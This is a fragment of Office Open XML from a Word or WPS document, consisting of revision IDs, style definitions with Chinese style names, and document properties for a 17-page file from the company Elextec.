    <w:rsid w:val="00F11774"/>
    <w:rsid w:val="00F135EF"/>
    <w:rsid w:val="00F159F5"/>
    <w:rsid w:val="00F214D5"/>
    <w:rsid w:val="00F25779"/>
    <w:rsid w:val="00F26ACF"/>
    <w:rsid w:val="00F42014"/>
    <w:rsid w:val="00F57091"/>
    <w:rsid w:val="00F6040B"/>
    <w:rsid w:val="00F60BCE"/>
    <w:rsid w:val="00F62A06"/>
    <w:rsid w:val="00F82111"/>
    <w:rsid w:val="00F918E1"/>
    <w:rsid w:val="00F97ADD"/>
    <w:rsid w:val="00F97D38"/>
    <w:rsid w:val="00FA2AC1"/>
    <w:rsid w:val="00FA4FBB"/>
    <w:rsid w:val="00FA646E"/>
    <w:rsid w:val="00FB0988"/>
    <w:rsid w:val="00FB3005"/>
    <w:rsid w:val="00FC0BBD"/>
    <w:rsid w:val="00FC3A94"/>
    <w:rsid w:val="00FD04D8"/>
    <w:rsid w:val="00FD5AE1"/>
    <w:rsid w:val="00FE1C1C"/>
    <w:rsid w:val="00FF0564"/>
    <w:rsid w:val="00FF3019"/>
    <w:rsid w:val="00FF6B5D"/>
    <w:rsid w:val="017F141B"/>
    <w:rsid w:val="01A90D20"/>
    <w:rsid w:val="020C169F"/>
    <w:rsid w:val="022D2FA3"/>
    <w:rsid w:val="02356363"/>
    <w:rsid w:val="030E4170"/>
    <w:rsid w:val="03E851D8"/>
    <w:rsid w:val="046A25C1"/>
    <w:rsid w:val="047E787E"/>
    <w:rsid w:val="04CB6E13"/>
    <w:rsid w:val="04CF2C60"/>
    <w:rsid w:val="05791AD3"/>
    <w:rsid w:val="05A25D19"/>
    <w:rsid w:val="05F87A58"/>
    <w:rsid w:val="06070959"/>
    <w:rsid w:val="065F6B24"/>
    <w:rsid w:val="069B290B"/>
    <w:rsid w:val="06DB0019"/>
    <w:rsid w:val="06DD1FFA"/>
    <w:rsid w:val="06EC7A9C"/>
    <w:rsid w:val="06F01544"/>
    <w:rsid w:val="078F58BD"/>
    <w:rsid w:val="07DE5FC2"/>
    <w:rsid w:val="084B47A0"/>
    <w:rsid w:val="08547D29"/>
    <w:rsid w:val="08C002F7"/>
    <w:rsid w:val="08FB76A9"/>
    <w:rsid w:val="09CA0F05"/>
    <w:rsid w:val="0A2B6744"/>
    <w:rsid w:val="0A345A73"/>
    <w:rsid w:val="0ACB3A27"/>
    <w:rsid w:val="0B8E4EE1"/>
    <w:rsid w:val="0C256A40"/>
    <w:rsid w:val="0C3041B1"/>
    <w:rsid w:val="0C333BF1"/>
    <w:rsid w:val="0C6226E5"/>
    <w:rsid w:val="0C976FDA"/>
    <w:rsid w:val="0CAD487D"/>
    <w:rsid w:val="0D8A0A3F"/>
    <w:rsid w:val="0DD551CB"/>
    <w:rsid w:val="0EA44ECC"/>
    <w:rsid w:val="0EB03077"/>
    <w:rsid w:val="106D0188"/>
    <w:rsid w:val="108110F4"/>
    <w:rsid w:val="1124541D"/>
    <w:rsid w:val="11683B33"/>
    <w:rsid w:val="11D9758B"/>
    <w:rsid w:val="12350BD1"/>
    <w:rsid w:val="125E5635"/>
    <w:rsid w:val="127C2A9B"/>
    <w:rsid w:val="12985B69"/>
    <w:rsid w:val="12EF0990"/>
    <w:rsid w:val="13034914"/>
    <w:rsid w:val="13211C58"/>
    <w:rsid w:val="139828DE"/>
    <w:rsid w:val="13B90142"/>
    <w:rsid w:val="147276CE"/>
    <w:rsid w:val="14C17B95"/>
    <w:rsid w:val="152155BE"/>
    <w:rsid w:val="15CA387B"/>
    <w:rsid w:val="15D52B49"/>
    <w:rsid w:val="160D2073"/>
    <w:rsid w:val="16874D27"/>
    <w:rsid w:val="16C52F9C"/>
    <w:rsid w:val="176669EA"/>
    <w:rsid w:val="18851E58"/>
    <w:rsid w:val="191A0906"/>
    <w:rsid w:val="191B2116"/>
    <w:rsid w:val="193930C5"/>
    <w:rsid w:val="195D7ECC"/>
    <w:rsid w:val="19D344E7"/>
    <w:rsid w:val="1A4D1B11"/>
    <w:rsid w:val="1AA10DE3"/>
    <w:rsid w:val="1AD33297"/>
    <w:rsid w:val="1AF16695"/>
    <w:rsid w:val="1AF90B32"/>
    <w:rsid w:val="1B3D7DC7"/>
    <w:rsid w:val="1B8064E0"/>
    <w:rsid w:val="1BD85E21"/>
    <w:rsid w:val="1CAF26B8"/>
    <w:rsid w:val="1D01267E"/>
    <w:rsid w:val="1D1E3EDE"/>
    <w:rsid w:val="1D22081D"/>
    <w:rsid w:val="1D317DA0"/>
    <w:rsid w:val="1D94694E"/>
    <w:rsid w:val="1D9D189A"/>
    <w:rsid w:val="1D9F1862"/>
    <w:rsid w:val="1DAE7C4D"/>
    <w:rsid w:val="1E256813"/>
    <w:rsid w:val="1EA1153D"/>
    <w:rsid w:val="1EBC0DC0"/>
    <w:rsid w:val="1FF65541"/>
    <w:rsid w:val="206B58D7"/>
    <w:rsid w:val="21062BF3"/>
    <w:rsid w:val="21090E4A"/>
    <w:rsid w:val="2129414D"/>
    <w:rsid w:val="219B1963"/>
    <w:rsid w:val="21F04F24"/>
    <w:rsid w:val="223C2365"/>
    <w:rsid w:val="22810EF5"/>
    <w:rsid w:val="22AD3450"/>
    <w:rsid w:val="22AD42A9"/>
    <w:rsid w:val="23144921"/>
    <w:rsid w:val="233B5138"/>
    <w:rsid w:val="23557DA4"/>
    <w:rsid w:val="23B35035"/>
    <w:rsid w:val="23C5542A"/>
    <w:rsid w:val="24265432"/>
    <w:rsid w:val="24316584"/>
    <w:rsid w:val="247F5700"/>
    <w:rsid w:val="24E0733F"/>
    <w:rsid w:val="255C1176"/>
    <w:rsid w:val="25702EA5"/>
    <w:rsid w:val="26036D3B"/>
    <w:rsid w:val="266723E9"/>
    <w:rsid w:val="26785BC8"/>
    <w:rsid w:val="26953EDC"/>
    <w:rsid w:val="272A56B0"/>
    <w:rsid w:val="279A626B"/>
    <w:rsid w:val="27D949B8"/>
    <w:rsid w:val="27E6487E"/>
    <w:rsid w:val="27F14D15"/>
    <w:rsid w:val="283908FD"/>
    <w:rsid w:val="28397092"/>
    <w:rsid w:val="28AC4BB5"/>
    <w:rsid w:val="28B87551"/>
    <w:rsid w:val="29065A01"/>
    <w:rsid w:val="298303EE"/>
    <w:rsid w:val="29DC43BB"/>
    <w:rsid w:val="2A320CA5"/>
    <w:rsid w:val="2CEB1EF0"/>
    <w:rsid w:val="2D01563D"/>
    <w:rsid w:val="2D384AE1"/>
    <w:rsid w:val="2D5C1DE3"/>
    <w:rsid w:val="2DC8146C"/>
    <w:rsid w:val="2E106CDD"/>
    <w:rsid w:val="2E5F023D"/>
    <w:rsid w:val="2EAE14FF"/>
    <w:rsid w:val="2EB159B4"/>
    <w:rsid w:val="2ECB4078"/>
    <w:rsid w:val="2ED90CD8"/>
    <w:rsid w:val="2F124BB8"/>
    <w:rsid w:val="2FA24FA3"/>
    <w:rsid w:val="2FAF1CB2"/>
    <w:rsid w:val="30C5248A"/>
    <w:rsid w:val="30E00F91"/>
    <w:rsid w:val="30FD2E3E"/>
    <w:rsid w:val="314C514B"/>
    <w:rsid w:val="317A170C"/>
    <w:rsid w:val="32234683"/>
    <w:rsid w:val="323B0065"/>
    <w:rsid w:val="329C6269"/>
    <w:rsid w:val="336D7FD4"/>
    <w:rsid w:val="338E1261"/>
    <w:rsid w:val="33C52E1C"/>
    <w:rsid w:val="35242D18"/>
    <w:rsid w:val="3539304C"/>
    <w:rsid w:val="354037DA"/>
    <w:rsid w:val="35AC637A"/>
    <w:rsid w:val="35B73C20"/>
    <w:rsid w:val="360865BD"/>
    <w:rsid w:val="36462ADB"/>
    <w:rsid w:val="377D7C23"/>
    <w:rsid w:val="37D2339F"/>
    <w:rsid w:val="37DF7F6C"/>
    <w:rsid w:val="37F37CC6"/>
    <w:rsid w:val="382C616D"/>
    <w:rsid w:val="385221D6"/>
    <w:rsid w:val="387830FF"/>
    <w:rsid w:val="389E2288"/>
    <w:rsid w:val="38A75F72"/>
    <w:rsid w:val="38AC07BC"/>
    <w:rsid w:val="39645390"/>
    <w:rsid w:val="39C4053D"/>
    <w:rsid w:val="39CD16B6"/>
    <w:rsid w:val="3A091314"/>
    <w:rsid w:val="3A7100C2"/>
    <w:rsid w:val="3AE533D6"/>
    <w:rsid w:val="3B3E333D"/>
    <w:rsid w:val="3B7D5EE9"/>
    <w:rsid w:val="3B9831CB"/>
    <w:rsid w:val="3C374356"/>
    <w:rsid w:val="3C7310D4"/>
    <w:rsid w:val="3CB0025F"/>
    <w:rsid w:val="3D696E26"/>
    <w:rsid w:val="3E6859F3"/>
    <w:rsid w:val="3EC06F90"/>
    <w:rsid w:val="3ECF21EC"/>
    <w:rsid w:val="3EEF65BF"/>
    <w:rsid w:val="3EF66BFC"/>
    <w:rsid w:val="3F556B83"/>
    <w:rsid w:val="3F66595C"/>
    <w:rsid w:val="3FBA772F"/>
    <w:rsid w:val="403672E6"/>
    <w:rsid w:val="40767865"/>
    <w:rsid w:val="4098622B"/>
    <w:rsid w:val="40F4301E"/>
    <w:rsid w:val="40FA5687"/>
    <w:rsid w:val="410F1ECE"/>
    <w:rsid w:val="411D57DC"/>
    <w:rsid w:val="41A22B1D"/>
    <w:rsid w:val="41B36A4D"/>
    <w:rsid w:val="41BF58E6"/>
    <w:rsid w:val="41CD5EA7"/>
    <w:rsid w:val="41DB15F6"/>
    <w:rsid w:val="41E02D22"/>
    <w:rsid w:val="4223366B"/>
    <w:rsid w:val="428E33A1"/>
    <w:rsid w:val="42C124FC"/>
    <w:rsid w:val="42E33D2A"/>
    <w:rsid w:val="431B3FA9"/>
    <w:rsid w:val="43340ACF"/>
    <w:rsid w:val="433B4E32"/>
    <w:rsid w:val="435611E9"/>
    <w:rsid w:val="43954C3A"/>
    <w:rsid w:val="443977DD"/>
    <w:rsid w:val="45363701"/>
    <w:rsid w:val="45371822"/>
    <w:rsid w:val="45596AED"/>
    <w:rsid w:val="456666A3"/>
    <w:rsid w:val="45AB4ECA"/>
    <w:rsid w:val="45E77DE8"/>
    <w:rsid w:val="46084766"/>
    <w:rsid w:val="46483CAB"/>
    <w:rsid w:val="46C8773A"/>
    <w:rsid w:val="470643FB"/>
    <w:rsid w:val="476E7848"/>
    <w:rsid w:val="47FF60D2"/>
    <w:rsid w:val="483F40BA"/>
    <w:rsid w:val="48E64ADA"/>
    <w:rsid w:val="48F86E3A"/>
    <w:rsid w:val="49097B46"/>
    <w:rsid w:val="494D31B9"/>
    <w:rsid w:val="4A9F3386"/>
    <w:rsid w:val="4AAC2F9D"/>
    <w:rsid w:val="4ABC0C46"/>
    <w:rsid w:val="4B3C1C5B"/>
    <w:rsid w:val="4BEE0E9D"/>
    <w:rsid w:val="4C0D4151"/>
    <w:rsid w:val="4C245F2F"/>
    <w:rsid w:val="4C3F40D0"/>
    <w:rsid w:val="4C4D46CB"/>
    <w:rsid w:val="4C525A1E"/>
    <w:rsid w:val="4C67575B"/>
    <w:rsid w:val="4D0E693D"/>
    <w:rsid w:val="4D311C9F"/>
    <w:rsid w:val="4D5354E1"/>
    <w:rsid w:val="4D7D77AB"/>
    <w:rsid w:val="4D8325CA"/>
    <w:rsid w:val="4D933509"/>
    <w:rsid w:val="4DED64AD"/>
    <w:rsid w:val="4E021F7F"/>
    <w:rsid w:val="4E146AC2"/>
    <w:rsid w:val="4E1A4D9C"/>
    <w:rsid w:val="4E427495"/>
    <w:rsid w:val="4EF47D11"/>
    <w:rsid w:val="4FE14483"/>
    <w:rsid w:val="50652000"/>
    <w:rsid w:val="518A1C9E"/>
    <w:rsid w:val="518B61E4"/>
    <w:rsid w:val="51B86560"/>
    <w:rsid w:val="520452D9"/>
    <w:rsid w:val="5260105A"/>
    <w:rsid w:val="526F28DE"/>
    <w:rsid w:val="52792C72"/>
    <w:rsid w:val="528D46DB"/>
    <w:rsid w:val="52B60815"/>
    <w:rsid w:val="530B3EFA"/>
    <w:rsid w:val="531C743A"/>
    <w:rsid w:val="53AC2263"/>
    <w:rsid w:val="53C0239F"/>
    <w:rsid w:val="542759F8"/>
    <w:rsid w:val="54305312"/>
    <w:rsid w:val="559C437D"/>
    <w:rsid w:val="55E06BCA"/>
    <w:rsid w:val="55E716FB"/>
    <w:rsid w:val="561833DA"/>
    <w:rsid w:val="56322348"/>
    <w:rsid w:val="568603EE"/>
    <w:rsid w:val="57341164"/>
    <w:rsid w:val="573B7C16"/>
    <w:rsid w:val="57457CD2"/>
    <w:rsid w:val="574A3E86"/>
    <w:rsid w:val="57586068"/>
    <w:rsid w:val="58545CA0"/>
    <w:rsid w:val="587D5216"/>
    <w:rsid w:val="58EA2DC9"/>
    <w:rsid w:val="58F64737"/>
    <w:rsid w:val="58FB7621"/>
    <w:rsid w:val="5976248B"/>
    <w:rsid w:val="598D11C5"/>
    <w:rsid w:val="59F4375A"/>
    <w:rsid w:val="5A1B65F5"/>
    <w:rsid w:val="5AC70322"/>
    <w:rsid w:val="5B2D21B3"/>
    <w:rsid w:val="5B314FCC"/>
    <w:rsid w:val="5BE201FB"/>
    <w:rsid w:val="5C48654E"/>
    <w:rsid w:val="5CDD1D28"/>
    <w:rsid w:val="5CE81F4D"/>
    <w:rsid w:val="5D4D302A"/>
    <w:rsid w:val="5D994942"/>
    <w:rsid w:val="5E504D30"/>
    <w:rsid w:val="5F026280"/>
    <w:rsid w:val="60801B46"/>
    <w:rsid w:val="615D0C48"/>
    <w:rsid w:val="617F4A3B"/>
    <w:rsid w:val="6184480B"/>
    <w:rsid w:val="618854A4"/>
    <w:rsid w:val="61FD55DA"/>
    <w:rsid w:val="62330CAD"/>
    <w:rsid w:val="62565255"/>
    <w:rsid w:val="628D78A1"/>
    <w:rsid w:val="62BB2767"/>
    <w:rsid w:val="62FA357E"/>
    <w:rsid w:val="6302362A"/>
    <w:rsid w:val="637B42B5"/>
    <w:rsid w:val="64264492"/>
    <w:rsid w:val="642F6B90"/>
    <w:rsid w:val="647B6C19"/>
    <w:rsid w:val="647D2962"/>
    <w:rsid w:val="64FB728D"/>
    <w:rsid w:val="65647450"/>
    <w:rsid w:val="66CD6E10"/>
    <w:rsid w:val="66D04891"/>
    <w:rsid w:val="67651EDD"/>
    <w:rsid w:val="67906181"/>
    <w:rsid w:val="67B7592E"/>
    <w:rsid w:val="67B76F6B"/>
    <w:rsid w:val="67BB35D2"/>
    <w:rsid w:val="67C333BC"/>
    <w:rsid w:val="686D0AA3"/>
    <w:rsid w:val="68D825E9"/>
    <w:rsid w:val="695835F4"/>
    <w:rsid w:val="699C0725"/>
    <w:rsid w:val="6A800616"/>
    <w:rsid w:val="6A8713C2"/>
    <w:rsid w:val="6B864496"/>
    <w:rsid w:val="6BD774F4"/>
    <w:rsid w:val="6C580838"/>
    <w:rsid w:val="6C584DB4"/>
    <w:rsid w:val="6CFD129E"/>
    <w:rsid w:val="6D6F5669"/>
    <w:rsid w:val="6DB132AF"/>
    <w:rsid w:val="6DCD4702"/>
    <w:rsid w:val="6E6A0783"/>
    <w:rsid w:val="6ECF7846"/>
    <w:rsid w:val="6EDA5FB5"/>
    <w:rsid w:val="6EEE183E"/>
    <w:rsid w:val="6F731514"/>
    <w:rsid w:val="6FA71A20"/>
    <w:rsid w:val="6FD10DF0"/>
    <w:rsid w:val="6FD21403"/>
    <w:rsid w:val="6FD933F3"/>
    <w:rsid w:val="71B30032"/>
    <w:rsid w:val="72CB2832"/>
    <w:rsid w:val="72D20B8E"/>
    <w:rsid w:val="72EB0E8F"/>
    <w:rsid w:val="73717EF6"/>
    <w:rsid w:val="737C4F12"/>
    <w:rsid w:val="73B4512D"/>
    <w:rsid w:val="73E17306"/>
    <w:rsid w:val="73E31964"/>
    <w:rsid w:val="7408443F"/>
    <w:rsid w:val="74164F4C"/>
    <w:rsid w:val="74796485"/>
    <w:rsid w:val="757D661C"/>
    <w:rsid w:val="757E0775"/>
    <w:rsid w:val="75F13A05"/>
    <w:rsid w:val="76081E83"/>
    <w:rsid w:val="762717B2"/>
    <w:rsid w:val="764C7E26"/>
    <w:rsid w:val="76E36E51"/>
    <w:rsid w:val="776C6370"/>
    <w:rsid w:val="778043CE"/>
    <w:rsid w:val="77C404E6"/>
    <w:rsid w:val="77F6705A"/>
    <w:rsid w:val="782E366C"/>
    <w:rsid w:val="784A3B80"/>
    <w:rsid w:val="78970019"/>
    <w:rsid w:val="789E1675"/>
    <w:rsid w:val="78F9296E"/>
    <w:rsid w:val="794F426D"/>
    <w:rsid w:val="799F728A"/>
    <w:rsid w:val="79F34B12"/>
    <w:rsid w:val="7A785C3F"/>
    <w:rsid w:val="7A7E7541"/>
    <w:rsid w:val="7A976B46"/>
    <w:rsid w:val="7B3630E9"/>
    <w:rsid w:val="7C121D61"/>
    <w:rsid w:val="7C1F3E9D"/>
    <w:rsid w:val="7C507E38"/>
    <w:rsid w:val="7CC27CE7"/>
    <w:rsid w:val="7CDB1B6F"/>
    <w:rsid w:val="7D032274"/>
    <w:rsid w:val="7D75102C"/>
    <w:rsid w:val="7E3B5FEF"/>
    <w:rsid w:val="7E524AE8"/>
    <w:rsid w:val="7EE8755D"/>
    <w:rsid w:val="7EF34617"/>
    <w:rsid w:val="7F55757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5">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="25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9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
        <w:tab w:val="clear" w:pos="1275"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="60" w:line="320" w:lineRule="exact"/>
      <w:ind w:left="840" w:leftChars="400" w:firstLine="27" w:firstLineChars="13"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8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1">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="31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2D64B3"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16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9"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="14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9">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="14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0">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="14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paragraph" w:styleId="21">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="8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</w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="列出段落2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="14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paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="wfxrecipient"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="con"/>
    <w:basedOn w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="列出段落3"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="文档结构图 字符"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="1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1">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi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jpe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Elextec</Company>
  <Pages>17</Pages>
  <Words>3396</Words>
  <Characters>4305</Characters>
  <Lines>21</Lines>
  <Paragraphs>6</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4431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2022-12-05T07:26:00Z</dcterms:created>
  <dc:creator>Elextec</dc:creator>
  <cp:lastModifiedBy>WPS_1638762435</cp:lastModifiedBy>
  <cp:lastPrinted>2013-10-10T01:54:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-03T15:04:22Z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67370C55F9674EFCBEE361A46808A278</vt:lpwstr>
  </property>
</Properties>
</file>